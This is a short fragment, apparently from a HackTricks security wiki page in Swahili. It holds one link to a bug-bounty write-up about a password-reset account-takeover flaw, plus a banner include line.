- [Jinsi Nilivyogundua Hitilafu Muhimu ya Password Reset (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1)
{{#include ../banners/hacktricks-training.md}}